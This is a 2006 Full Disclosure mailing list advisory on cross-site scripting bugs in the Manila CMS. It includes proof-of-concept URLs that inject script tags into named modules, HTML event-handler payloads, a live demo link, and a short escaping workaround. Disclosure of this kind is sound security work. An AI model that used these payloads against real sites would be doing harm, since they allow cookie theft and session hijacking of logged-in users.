Full Disclosure mailing list archives
Manila.userland.com XSS'able
From: aaron <aaron () lo-res org>
Date: Sat, 15 Apr 2006 12:04:15 +0200
Manila from manila.userland.com is a widely deployed CMS (http://manila.userland.com/selectedCustomers). The following cross site scripting exploit was sent to userland.com on the 2nd of April.

Happy easter-hacking, live from the easterhegg (http://eh.cngw.org)

--- snip -- original post to manila-bugs () userland com follows ----
Multiple XSS bugs in manila.

To: manila-bugs () userland com
Authors: Michael Bauer <mihi () lo-res org>, Aaron Kaplan <aaron () lo-res org>

These bugs will be reported to you and released to the public 10 days after submission to userland.com, as we strongly believe in full disclosure.

Software: manila
Vendor: userland.com
Versions tested: <meta name="generator" content="UserLand Frontier 9.0.1">

Overview:
Manila is vulnerable to several XSS injections which can be abused to steal a cookie from a logged-in user. This means taking over his session and doing stuff in his name.

Details:

In the module "msgReader"
-------------------------
proof of concept:
http://manila.userland.com/discuss/msgReader$1?mode=%22%3E%3Cscript%3Ealert('XSS!')%3C/script%3E

In the module "sendMail":
-------------------------
proof of concept:
http://profiles.userland.com/sendMail?usernum=2500&referer=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

In the module "editInBrowser"
-----------------------------
explanation: it is possible to use <a> and other html tags to put javascript instructions into the webpage.
examples:
<a href=javascript:alert('xss!')>click here</a>
<a href=# onmouseover="alert('xss!')">click here</a>
<a href=# onmouseout="alert('xss!')">click here</a>

A demo can be seen on http://mana.manila.at/discuss/msgReader$15?mode=day as we got an account there.

Workaround:
htmlescape all user input! If you want to accept html as input, write your own html parser for a limited html subset.

Disclaimer:
For educational purposes only, we are not responsible for any harm produced by the security hole we published.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/